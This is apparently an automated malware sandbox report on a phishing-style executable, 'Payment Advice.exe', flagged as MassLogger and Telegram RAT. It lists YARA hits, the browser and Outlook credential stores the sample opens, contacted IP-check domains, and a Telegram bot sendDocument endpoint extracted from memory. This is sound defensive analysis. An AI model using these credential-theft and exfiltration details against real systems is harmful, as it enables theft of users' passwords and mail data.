                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Users\user\Desktop\Payment Advice.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected MSIL Logger
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3db1398.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3e343a8.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Payment Advice.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3db1398.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3e343a8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Payment Advice.exe PID: 2708, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Payment Advice.exe PID: 5216, type: MEMORYSTR
                  Yara detected MassLogger RAT
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3db1398.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3e343a8.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Payment Advice.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3db1398.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3e343a8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Payment Advice.exe PID: 2708, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Payment Advice.exe PID: 5216, type: MEMORYSTR
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3db1398.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3e343a8.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Payment Advice.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3db1398.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3e343a8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Payment Advice.exe PID: 2708, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Payment Advice.exe PID: 5216, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\Payment Advice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\Desktop\Payment Advice.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3db1398.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3e343a8.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Payment Advice.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3db1398.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3e343a8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2996681350.0000000003523000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Payment Advice.exe PID: 2708, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Payment Advice.exe PID: 5216, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected MSIL Logger
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3db1398.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3e343a8.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Payment Advice.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3db1398.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3e343a8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Payment Advice.exe PID: 2708, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Payment Advice.exe PID: 5216, type: MEMORYSTR
                  Yara detected MassLogger RAT
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3db1398.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3e343a8.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Payment Advice.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3db1398.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3e343a8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Payment Advice.exe PID: 2708, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Payment Advice.exe PID: 5216, type: MEMORYSTR
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3db1398.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3e343a8.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Payment Advice.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3db1398.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3e343a8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Payment Advice.exe PID: 2708, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Payment Advice.exe PID: 5216, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts111
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		1
                  Input Capture                  		13
                  System Information Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                  Obfuscated Files or Information                  		Security Account Manager1
                  Query Registry                  		SMB/Windows Admin Shares1
                  Email Collection                  		2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                  Software Packing                  		NTDS1
                  Security Software Discovery                  		Distributed Component Object Model1
                  Input Capture                  		13
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Timestomp                  		LSA Secrets1
                  Process Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials31
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Masquerading                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                  Virtualization/Sandbox Evasion                  		Proc Filesystem1
                  System Network Configuration Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                  Process Injection                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Payment Advice.exe35%VirustotalBrowse

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://www.fontbureau.com/designersG0%Avira URL Cloudsafe
                  http://www.sajatypeworks.com0%Avira URL Cloudsafe
                  http://www.fontbureau.com/designers/?0%Avira URL Cloudsafe
                  http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
                  http://www.typography.netD0%Avira URL Cloudsafe
                  http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
                  http://www.fontbureau.com/designers?0%Avira URL Cloudsafe
                  http://www.fontbureau.com/designers/cabarga.htmlN0%Avira URL Cloudsafe
                  http://www.goodfont.co.kr0%Avira URL Cloudsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%Avira URL Cloudsafe
                  http://www.fontbureau.com/designers/frere-user.html0%Avira URL Cloudsafe
                  http://www.founder.com.cn/cn0%Avira URL Cloudsafe
                  http://www.fontbureau.com/designers80%Avira URL Cloudsafe
                  http://www.galapagosdesign.com/DPlease0%Avira URL Cloudsafe
                  http://www.fonts.com0%Avira URL Cloudsafe
                  http://www.sakkal.com0%Avira URL Cloudsafe
                  http://www.jiyu-kobo.co.jp/0%Avira URL Cloudsafe
                  http://www.sandoll.co.kr0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  		104.21.80.1
                  		truefalse
                    		high
                    checkip.dyndns.com
                    		132.226.247.73
                    		truefalse
                      		high
                      checkip.dyndns.org
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          		high
                          http://checkip.dyndns.org/false
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.apache.org/licenses/LICENSE-2.0Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.comPayment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.fontbureau.com/designersGPayment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.com/designers/?Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.founder.com.cn/cn/bThePayment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.com/designers?Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://reallyfreegeoip.orgdPayment Advice.exe, 00000005.00000002.2996681350.000000000349C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.tiro.comPayment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://checkip.dyndns.orgPayment Advice.exe, 00000005.00000002.2996681350.000000000346C000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.fontbureau.com/designersPayment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.goodfont.co.krPayment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.carterandcone.comlPayment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.sajatypeworks.comPayment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.typography.netDPayment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlNPayment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.founder.com.cn/cn/cThePayment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.galapagosdesign.com/staff/dennis.htmPayment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.founder.com.cn/cnPayment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/frere-user.htmlPayment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://reallyfreegeoip.org/xml/8.46.123.189lPayment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://checkip.dyndns.comdPayment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://checkip.dyndns.org/qPayment Advice.exe, 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.jiyu-kobo.co.jp/Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://reallyfreegeoip.org/xml/8.46.123.189dPayment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://reallyfreegeoip.orgPayment Advice.exe, 00000005.00000002.2996681350.000000000349C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://checkip.dyndns.orgdPayment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.galapagosdesign.com/DPleasePayment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://reallyfreegeoip.orgPayment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.fontbureau.com/designers8Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.fonts.comPayment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.sandoll.co.krPayment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://checkip.dyndns.comPayment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.urwpp.deDPleasePayment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.zhongyicts.com.cnPayment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://checkip.dyndns.org/dPayment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePayment Advice.exe, 00000000.00000002.1762503668.000000000308E000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000005.00000002.2996681350.0000000003401000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.sakkal.comPayment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://api.telegram.org/bot-/sendDocument?chat_id=Payment Advice.exe, 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://reallyfreegeoip.org/xml/Payment Advice.exe, 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      104.21.80.1
                                                                      		reallyfreegeoip.orgUnited States
                                                                      		13335CLOUDFLARENETUSfalse
                                                                      132.226.247.73
                                                                      		checkip.dyndns.comUnited States
                                                                      		16989UTMEMUSfalse

                                                                      General Information

                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                      Analysis ID:1630045
                                                                      Start date and time:2025-03-05 13:07:19 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 5m 55s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:10
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:Payment Advice.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@8/6@2/2
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:
                                                                      • Successful, ratio: 99%
                                                                      • Number of executed functions: 38
                                                                      • Number of non-executed functions: 10
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 23.199.214.10, 4.245.163.56, 13.107.246.60
                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      07:08:17API Interceptor1x Sleep call for process: Payment Advice.exe modified
                                                                      07:08:19API Interceptor10x Sleep call for process: powershell.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      104.21.80.1DHL AWB Receipt_pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                      • www.rbopisalive.cyou/2dxw/
                                                                      Marzec 2025-faktura.pdf.exeGet hashmaliciousFormBookBrowse
                                                                      • www.oldpay.online/u023/?lneDc=2js00DxFGjY6gHlVOW1q9a10L3HzPIs7WpRmaT2A/LnakQk0VzYAjcxSKMUcEwKHsPPKaiHoQA==&NvExnX=FrapFFYPB
                                                                      z1companyProfileandproducts.exeGet hashmaliciousFormBookBrowse
                                                                      • www.dd87558.vip/uoki/
                                                                      http://7a.ithuupvudv.ruGet hashmaliciousUnknownBrowse
                                                                      • 7a.ithuupvudv.ru/favicon.ico
                                                                      PRI_VTK250419A.exeGet hashmaliciousLokibotBrowse
                                                                      • touxzw.ir/scc1/five/fre.php
                                                                      dfiCWCanbj.exeGet hashmaliciousLokibotBrowse
                                                                      • touxzw.ir/sccc/five/fre.php
                                                                      laser (2).ps1Get hashmaliciousFormBookBrowse
                                                                      • www.lucynoel6465.shop/jgkl/
                                                                      laser.ps1Get hashmaliciousFormBookBrowse
                                                                      • www.tumbetgirislinki.fit/k566/
                                                                      QUOTATION REQUEST.exeGet hashmaliciousFormBookBrowse
                                                                      • www.shlomi.app/t3l4/
                                                                      Quotation.exeGet hashmaliciousFormBookBrowse
                                                                      • www.askvtwv8.top/uztg/
                                                                      132.226.247.7350% deposit's payment advice.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • checkip.dyndns.org/
                                                                      rPurchaseOrder-25-1201.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • checkip.dyndns.org/
                                                                      Purchase Order # 8MJA15.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • checkip.dyndns.org/
                                                                      akXjj2a58b.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                      • checkip.dyndns.org/
